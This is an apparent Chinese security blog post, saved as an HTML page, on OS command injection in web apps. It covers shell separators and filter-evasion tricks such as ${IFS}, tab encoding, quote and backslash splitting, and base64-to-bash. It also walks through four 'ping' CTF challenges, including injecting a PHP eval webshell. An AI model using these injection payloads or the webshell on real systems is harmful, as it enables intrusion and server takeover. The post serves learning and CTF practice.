<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="命令执行漏洞"><meta name="keywords" content=""><meta name="author" content="YTsang"><meta name="copyright" content="YTsang"><title>命令执行漏洞 | Y. blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.8.2"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.8.2"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="Y. blog" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.</span> <span class="toc-text">系统命令执行漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E7%AE%A1%E9%81%93%E7%AC%A6"><span class="toc-number">1.1.</span> <span class="toc-text">常见管道符</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#windows%E7%B3%BB%E7%BB%9F%E6%94%AF%E6%8C%81%E7%9A%84%E7%AE%A1%E9%81%93%E7%AC%A6"><span class="toc-number">1.1.1.</span> <span class="toc-text">windows系统支持的管道符</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Linux%E7%B3%BB%E7%BB%9F%E6%94%AF%E6%8C%81%E7%9A%84%E7%AE%A1%E9%81%93%E7%AC%A6"><span class="toc-number">1.1.2.</span> <span class="toc-text">Linux系统支持的管道符</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%87%E6%BB%A4%E6%96%B9%E6%B3%95"><span class="toc-number">1.2.</span> <span class="toc-text">过滤方法</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%A9%BA%E6%A0%BC%E8%BF%87%E6%BB%A4"><span class="toc-number">1.2.1.</span> <span class="toc-text">空格过滤</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%BB%91%E5%90%8D%E5%8D%95%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.2.</span> <span class="toc-text">黑名单绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BB%95%E8%BF%87%E5%89%8D%E7%BC%80%E9%99%90%E5%88%B6"><span class="toc-number">1.2.3.</span> <span class="toc-text">绕过前缀限制</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AF%BB%E6%96%87%E4%BB%B6%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.4.</span> <span class="toc-text">读文件绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BB%95%E8%BF%87%E9%95%BF%E5%BA%A6%E9%99%90%E5%88%B6"><span class="toc-number">1.2.5.</span> <span class="toc-text">绕过长度限制</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE"><span class="toc-number">1.3.</span> <span class="toc-text">题目</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ping1"><span class="toc-number">1.3.1.</span> <span class="toc-text">ping1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ping2"><span class="toc-number">1.3.2.</span> <span class="toc-text">ping2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ping3"><span class="toc-number">1.3.3.</span> <span class="toc-text">ping3</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ping4"><span class="toc-number">1.3.4.</span> <span class="toc-text">ping4</span></a></li></ol></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://note.youdao.com/yws/api/personal/file/WEB4d4bfca5baf6c87d4aa15350aa33e8a7?method=download&amp;shareKey=fec53138a84367efadb03ddfa08bcb24"></div><div class="author-info__name text-center">YTsang</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">16</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://file.51ppt.vip/2020/2-8/192744-1521977264b903.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Y. blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right"></span></div><div id="post-info"><div id="post-title">命令执行漏洞</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2021-03-27</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p> <strong>命令执行（Command Execution）</strong>漏洞是指由于web服务器存在安全漏洞，使恶意代码被执行，导致信息泄露或shell权限被拿下，可以发生在web的各种组件，大多是对输入命令安全检测不足导致。</p>
<h1 id="系统命令执行漏洞"><a href="#系统命令执行漏洞" class="headerlink" title="系统命令执行漏洞"></a>系统命令执行漏洞</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">system()</span><br><span class="line">passthru()</span><br><span class="line">exec()</span><br><span class="line">shell_exec()</span><br><span class="line">popen()</span><br><span class="line">proc_open()</span><br><span class="line">pcntl_exec()</span><br><span class="line">反引号</span><br><span class="line">···</span><br></pre></td></tr></table></figure>

<p>以上为常用于执行系统命令的函数，多用于执行ping的网页，通常在利用时会用到管道符。</p>
<h2 id="常见管道符"><a href="#常见管道符" class="headerlink" title="常见管道符"></a>常见管道符</h2><h3 id="windows系统支持的管道符"><a href="#windows系统支持的管道符" class="headerlink" title="windows系统支持的管道符"></a>windows系统支持的管道符</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&quot;|&quot;直接执行后面的语句</span><br><span class="line">&quot;||&quot;如果前面命令是错的那么就执行后面的语句，否则只执行前面的语句</span><br><span class="line">&quot;&amp;&quot;前面和后面命令都要执行，无论前面真假</span><br><span class="line">&quot;&amp;&amp;&quot;如果前面为假，后面的命令也不执行，如果前面为真则执行两条命令</span><br></pre></td></tr></table></figure>

<h3 id="Linux系统支持的管道符"><a href="#Linux系统支持的管道符" class="headerlink" title="Linux系统支持的管道符"></a>Linux系统支持的管道符</h3><p>与windows系统基本一致，多了一个<code>；</code>，用法同<code>&amp;</code>。</p>
<h2 id="过滤方法"><a href="#过滤方法" class="headerlink" title="过滤方法"></a>过滤方法</h2><h3 id="空格过滤"><a href="#空格过滤" class="headerlink" title="空格过滤"></a>空格过滤</h3><p>这是最常见的限制，也是最容易绕过的限制。</p>
<ul>
<li><p>${IFS}</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">cat flag</span><br><span class="line">cat$&#123;IFS&#125;flag</span><br><span class="line">cat$&#123;IFS&#125;$1flag</span><br><span class="line">cat$IFS$1flag</span><br></pre></td></tr></table></figure>
</li>
<li><p>&lt;&gt;</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cat flag</span><br><span class="line">cat&lt;&gt;flag</span><br><span class="line">cat&lt;flag</span><br></pre></td></tr></table></figure>
</li>
<li><p>%09</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat flag</span><br><span class="line">cat%09flag</span><br></pre></td></tr></table></figure>

</li>
</ul>
<h3 id="黑名单绕过"><a href="#黑名单绕过" class="headerlink" title="黑名单绕过"></a>黑名单绕过</h3><ul>
<li><p>拼接</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">a&#x3D;c;b&#x3D;at;c&#x3D;fl;d&#x3D;ag;$a$b $c$d</span><br><span class="line">cat flag</span><br></pre></td></tr></table></figure>
</li>
<li><p>base64编码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;Y2F0IGZsYWc&#x3D;&quot;|base64 -d|bash   Y2F0IGZsYWc&#x3D;即为</span><br><span class="line">Y2F0IGZsYWc&#x3D;即为&quot;cat flag&quot;base64编码</span><br></pre></td></tr></table></figure>
</li>
<li><p>引号</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">c&quot;&quot;at fl&#39;&#39;ag</span><br><span class="line">cat flag</span><br></pre></td></tr></table></figure>
</li>
<li><p>反斜线</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">c\at fl\ag</span><br><span class="line">cat flag</span><br><span class="line"></span><br></pre></td></tr></table></figure>

</li>
</ul>
<h3 id="绕过前缀限制"><a href="#绕过前缀限制" class="headerlink" title="绕过前缀限制"></a>绕过前缀限制</h3><p>用分号和管道符绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">ls;cat &#x2F;flag</span><br><span class="line">ls&amp;&amp;cat &#x2F;flag</span><br><span class="line">ls&amp;cat &#x2F;flag</span><br><span class="line">ls|cat &#x2F;flag</span><br><span class="line">ls||cat &#x2F;flag</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="读文件绕过"><a href="#读文件绕过" class="headerlink" title="读文件绕过"></a>读文件绕过</h3><p>cat被过滤用一下命令代替</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">(1)more:一页一页的显示档案内容</span><br><span class="line">(2)less:与 more 类似，但是比 more 更好的是，他可以[pg dn][pg up]翻页</span><br><span class="line">(3)head:查看头几行</span><br><span class="line">(4)tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示</span><br><span class="line">(5)tail:查看尾几行</span><br><span class="line">(6)nl：显示的时候，顺便输出行号</span><br><span class="line">(7)od:以二进制的方式读取档案内容</span><br><span class="line">(8)vi:一种编辑器，这个也可以查看</span><br><span class="line">(9)vim:一种编辑器，这个也可以查看</span><br><span class="line">(10)sort:可以查看</span><br><span class="line">(11)uniq:可以查看</span><br><span class="line">(12)file -f:报错出具体内容</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="绕过长度限制"><a href="#绕过长度限制" class="headerlink" title="绕过长度限制"></a>绕过长度限制</h3><p>通过<code>&gt;</code>将命令输入文件名中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cat zbc.txt</span><br><span class="line">echo &quot;520&quot;&gt;zbc.txt</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h2><h3 id="ping1"><a href="#ping1" class="headerlink" title="ping1"></a>ping1</h3><ul>
<li><p>首先看一下文件列表</p>
<p><code>127.0.0.1|ls</code></p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBa1eba71c8713ee2b70604b32dbfa170d?method=download&shareKey=6e605a8682108dc1ab8c436fdf850d60"></p>
</li>
<li><p>直接写一个一句话木马传进去试试，记得在<code>$</code>前加上转义字符</p>
</li>
</ul>
<p>``127.0.0.1|echo “<?php @eval(\$_POST[cmd]);?>“&gt;shell.php`</p>
<ul>
<li><p>写入成功，用蚁剑读flag</p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB04b374b8b2375a0b69575cb7fc9e46b2?method=download&shareKey=6a35ca8eb03b89bc5573b8f8ecd1f99e"></p>
</li>
</ul>
<h3 id="ping2"><a href="#ping2" class="headerlink" title="ping2"></a>ping2</h3><ul>
<li><p>先找一下flag</p>
<p><code>127.0.0.1|find / -name &quot;flag&quot;</code></p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBcfcbe1df17c099e201e94e929e492fcd?method=download&shareKey=eb7ffb43ef8a04fd24376962371cad47"></p>
</li>
<li><p>读flag</p>
<p><code> 127.0.0.1|cat /tmp/flag</code></p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB5c0aa26e308726cbcf4370410601c7bd?method=download&shareKey=1fc85dafc5603433410e2d7569f57026"></p>
</li>
</ul>
<h3 id="ping3"><a href="#ping3" class="headerlink" title="ping3"></a>ping3</h3><ul>
<li><p>同样找flag，发现空格被过滤，用<code>$IFS$9</code>绕过</p>
<p><code>127.0.0.1&amp;&amp;find$IFS$9/$IFS$9-name$IFS$9&quot;flag&quot;</code></p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB78c8ed2ef9c1460469bea1954f6bc6e9?method=download&shareKey=bad786447fad986f71855d394b358e4b"></p>
</li>
<li><p>绕过空格发现对flag进行保护，再绕找到flag</p>
<p><code>127.0.0.1&amp;&amp;find$IFS$9/$IFS$9-name$IFS$9&quot;fla&quot;&quot;g&quot;</code></p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBe6fdf5ee65d73a09b9e6e5f57738f5cf?method=download&shareKey=fdb63644ac7c68d948b6182b2fa7f1a3"></p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB15d502c93f4941aa58957fcacb391061?method=download&shareKey=2c6a44a2839999a28d307a48b2d7ba67"></p>
</li>
<li><p>最后读flag</p>
<p><code>127.0.0.1&amp;&amp;cat%09/fla&quot;&quot;g</code></p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBbaf1c844fe3c75579a971a8f693cd8e4?method=download&shareKey=7c7e4ca4f072c7de20aaf42fb9cae525"></p>
</li>
</ul>
<h3 id="ping4"><a href="#ping4" class="headerlink" title="ping4"></a>ping4</h3><ul>
<li><p>同样看列表，发现<code>ls</code>不行，换<code>dir</code>试下读到flag</p>
<p><code>127.0.0.1&amp;&amp;dir</code></p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBabaf9e543dea0d362bf802222f756291?method=download&shareKey=c78f35b47c72a5b504eecedfa8a0af08"></p>
</li>
<li><p><code>.bak</code>是备份文件，下载发现是源码</p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB3dbeab12d4ef868e2623b8c45bee553b?method=download&shareKey=effa52c0ebde61cde90d6fcb8491089b"></p>
</li>
<li><p>过滤了很多东西，用<code>\</code>绕过过滤读到flag</p>
<p><code> 127.0.0.1&amp;&amp;c\a\t /flag</code></p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB095d51ce4c4ee6e6cc72b10d944f4681?method=download&shareKey=e997e6fcd994fc12199c917cec90bc8e"></p>
</li>
</ul>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">YTsang</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://example.com/2021/03/27/命令执行漏洞/">http://example.com/2021/03/27/命令执行漏洞/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://example.com">Y. blog</a>！</span></div></div><div class="post-meta__tag-list"></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2021/03/28/preg-replace-%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/"><i class="fa fa-chevron-left">  </i><span>preg_replace()代码执行</span></a></div><div class="next-post pull-right"><a href="/2021/01/31/%E5%9F%BA%E4%BA%8E%E8%BF%90%E8%A1%8C%E9%94%99%E8%AF%AF%E7%9A%84%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8/"><span>基于运行错误的布尔盲注</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://file.51ppt.vip/2020/2-8/192744-1521977264b903.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2021 By YTsang</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.8.2"></script><script src="/js/fancybox.js?version=1.8.2"></script><script src="/js/sidebar.js?version=1.8.2"></script><script src="/js/copy.js?version=1.8.2"></script><script src="/js/fireworks.js?version=1.8.2"></script><script src="/js/transition.js?version=1.8.2"></script><script src="/js/scroll.js?version=1.8.2"></script><script src="/js/head.js?version=1.8.2"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>